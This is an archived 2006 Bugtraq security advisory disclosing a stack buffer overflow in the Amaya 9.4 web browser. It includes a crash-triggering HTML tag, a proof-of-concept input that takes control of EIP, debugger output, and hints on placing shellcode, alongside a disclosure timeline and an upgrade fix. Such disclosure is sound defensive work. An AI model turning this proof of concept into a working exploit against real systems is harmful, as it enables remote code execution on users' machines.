Home page logo
/

bugtraq logo Bugtraq mailing list archives

[BuHa-Security] Stack Based Buffer Overflow Vulnerability in Amaya 9.4 #2
From: bugtraq () morph3us org
Date: 12 Apr 2006 23:59:17 -0000

-----BEGIN PGP SIGNED MESSAGE-----
Hash: RIPEMD160

 ---------------------------------------------------
| BuHa Security-Advisory #11    |    Apr 12th, 2006 |
 ---------------------------------------------------
| Vendor   | W3C's Amaya                            |
| URL      | http://www.w3.org/Amaya/               |
| Version  | <= 9.4                                 |
| Risk     | Critical (Remote Code Execution)       |
 ---------------------------------------------------

o Description:
=============

The current releases, Amaya 9.5, is available for Linux, Windows and
now MacOS X (see screenshot). It supports HTML 4.01, XHTML 1.0, XHTML
Basic, XHTML 1.1, HTTP 1.1, MathML 2.0, many CSS 2 features, and
includes SVG support (transformation, transparency, and SMIL animation).

See the "Amaya Overview" page [1] for more details.

o Stack overflow:
================

The following code snippet forces Amaya 9.4 to crash:
<legend color="Ax200">

eax=41414141 ebx=02ae7200 ecx=41414141 edx=41414141 esi=00000000
edi=00000000 eip=00516135 esp=0012e1cc ebp=007dd6e8 iopl=0
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000  efl=00010206

        00516114 56               push    esi
        00516115 57               push    edi
        00516116 33ff             xor     edi,edi
        00516118 33f6             xor     esi,esi
        0051611a 3bcf             cmp     ecx,edi
        0051611c 893d943df101     mov     [amaya+0x1b13d94
                                            (01f13d94)],edi
        00516122 7511             jnz     amaya+0x116135 (00516135)
        00516124 6a0a             push    0xa
        00516126 e825d80500       call    amaya+0x173950 (00573950)
        0051612b 83c404           add     esp,0x4
        0051612e 8bd7             mov     edx,edi
        00516130 8bc6             mov     eax,esi
        00516132 5f               pop     edi
        00516133 5e               pop     esi
        00516134 c3               ret
FAULT ->00516135 8b4134           mov     eax,[ecx+0x34]
                                            ds:0023:41414175=????????
        00516138 3bc7             cmp     eax,edi
        0051613a 74f2             jz      amaya+0x11612e (0051612e)
        0051613c 8b4938           mov     ecx,[ecx+0x38]
        0051613f 5f               pop     edi
        00516140 8bd1             mov     edx,ecx
        00516142 5e               pop     esi
        00516143 c3               ret
        Nopslide..

We are able to control the EIP:
<legend color=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAABBBB>

eax=0ade6e01 ebx=0ac7da00 ecx=0ade6e28 edx=1bce0002 esi=007de85a
edi=01aeb154 eip=42424242 esp=0012e79c ebp=007da170 iopl=0
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000  efl=00000202

Funktion: <nosymbols>
No prior disassembly possible
42424242 ?? ???
42424244 ?? ???
42424246 ?? ???
42424248 ?? ???
4242424a ?? ???
4242424c ?? ???

Online-demo:
http://morph3us.org/security/pen-testing/amaya/amaya-94-legend-color.html

In fact, sucessful exploitation of this vulnerability is not that easy
because non-text characters were modfified during parsing therefore you
have to find a place where to place the shellcode. Naturally you have
to avoid null bytes too because Amaya would stop parsing the attribute
value and the overflow would not get triggered.

o Disclosure Timeline:
=====================

21 Dec 05 - Vulnerability discovered.
21 Feb 06 - Vendor contacted.
23 Feb 06 - Vendor confirmed vulnerability.
08 Mar 06 - Vendor fixed vulnerability.
12 Apr 06 - Public release.

o Solution:
==========

Upgrade to the latest version of Amaya. [2]

o Credits:
=========

Thomas Waldegger <bugtraq () morph3us org>
BuHa-Security Community - http://buha.info/board/

If you have questions, suggestions or criticism about the advisory feel
free to send me a mail. The address 'bugtraq () morph3us org' is more a
spam address than a regular mail address therefore it's possible that
some mails get ignored. Please use the contact details at
http://morph3us.org/ to contact me.

Greets fly out to cyrus-tc, destructor, nait, rhy, trappy and all
members of BuHa.

Advisory online:
http://morph3us.org/advisories/20060412-amaya-94-2.txt

[1] http://www.w3.org/Amaya/Amaya.html
[2] http://www.w3.org/Amaya/User/BinDist.html

-----BEGIN PGP SIGNATURE-----
Version: n/a
Comment: http://morph3us.org/

iD8DBQFEPYDPkCo6/ctnOpYRA+b0AJ0S4sWE2UE0WjMrFBeRKwmWWd9oIwCfSWdX
MW1HldAZyLYolnZ8k/jA/Vw=
=PeiV
-----END PGP SIGNATURE-----


  By Date           By Thread  

Current thread:
  • [BuHa-Security] Stack Based Buffer Overflow Vulnerability in Amaya 9.4 #2 bugtraq (Apr 13)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]